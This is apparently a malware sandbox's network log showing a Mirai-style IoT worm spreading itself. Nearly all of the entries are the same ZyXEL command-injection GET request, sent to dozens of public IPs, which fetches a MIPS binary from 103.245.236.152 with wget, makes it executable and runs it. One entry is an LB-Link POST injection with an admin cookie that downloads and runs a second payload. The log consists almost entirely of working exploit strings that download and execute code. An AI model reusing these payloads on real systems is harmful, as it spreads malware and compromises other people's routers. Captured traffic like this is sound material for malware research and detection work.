                                      Jan 14, 2024 15:50:37.084913969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2082192.168.2.144012470.133.57.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.084954977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2083192.168.2.1459054119.130.169.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085021019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2084192.168.2.143414024.250.79.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085046053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2085192.168.2.1439590175.68.108.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085092068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2086192.168.2.146045813.194.118.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085130930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2087192.168.2.145271484.193.25.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085160017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2088192.168.2.144385238.176.4.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085186958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2089192.168.2.143574868.141.119.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085253954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2090192.168.2.144832418.186.81.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085294962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2091192.168.2.1459460109.11.3.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085340023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2092192.168.2.1443070118.36.234.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085411072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2093192.168.2.14556385.19.154.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085450888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2094192.168.2.1436464203.67.183.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.085786104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2095192.168.2.145304031.220.17.1728080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.940392017 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2096192.168.2.144770472.10.58.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.093863010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2097192.168.2.1442436121.26.249.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.093909025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2098192.168.2.145656084.232.188.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.093949080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2099192.168.2.1443646137.189.38.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094002008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2100192.168.2.1448936200.17.130.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094043016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2101192.168.2.145036485.75.171.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094094038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2102192.168.2.1437690173.219.61.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094140053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2103192.168.2.1456454107.77.38.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094187975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2104192.168.2.1446014106.153.9.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094227076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2105192.168.2.1458826203.152.69.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094278097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2106192.168.2.144450463.211.135.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094301939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2107192.168.2.1446484146.107.17.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094362020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2108192.168.2.1455286137.16.175.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094409943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2109192.168.2.1434514104.0.254.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094456911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2110192.168.2.144686080.146.107.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094489098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2111192.168.2.145429495.17.226.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094513893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2112192.168.2.1447352177.167.149.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094567060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2113192.168.2.1457612100.11.58.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094608068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2114192.168.2.145171845.130.204.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094635963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2115192.168.2.143986634.161.200.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094691038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2116192.168.2.1448124102.42.201.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094748020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2117192.168.2.144217498.91.149.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094780922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2118192.168.2.1451192154.235.213.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094811916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2119192.168.2.144925480.160.25.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094835997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2120192.168.2.145785843.90.27.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094888926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2121192.168.2.143984454.94.155.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094932079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2122192.168.2.14571169.134.254.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.094968081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2123192.168.2.1448336155.150.56.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095027924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2124192.168.2.1435658123.161.27.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095057964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2125192.168.2.1448368181.139.21.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095104933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2126192.168.2.144984663.29.236.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095160007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2127192.168.2.1435362140.210.133.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095201015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2128192.168.2.145222072.68.32.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095243931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2129192.168.2.1453150114.134.69.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095278025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2130192.168.2.1444548131.97.38.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095299006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2131192.168.2.144928824.246.176.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095352888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2132192.168.2.1456132209.211.125.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095396042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2133192.168.2.144013654.245.32.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095421076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2134192.168.2.1455372188.138.33.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095468044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2135192.168.2.1434162112.87.149.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095515966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2136192.168.2.1443818112.227.109.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095552921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2137192.168.2.145287217.135.166.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095586061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2138192.168.2.1438560124.147.148.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095601082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2139192.168.2.1450714132.70.199.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095633030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2140192.168.2.1436848145.136.233.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095653057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2141192.168.2.1436388136.4.0.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.095710039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2142192.168.2.14530584.173.4.36443
                                      TimestampBytes transferredDirectionData
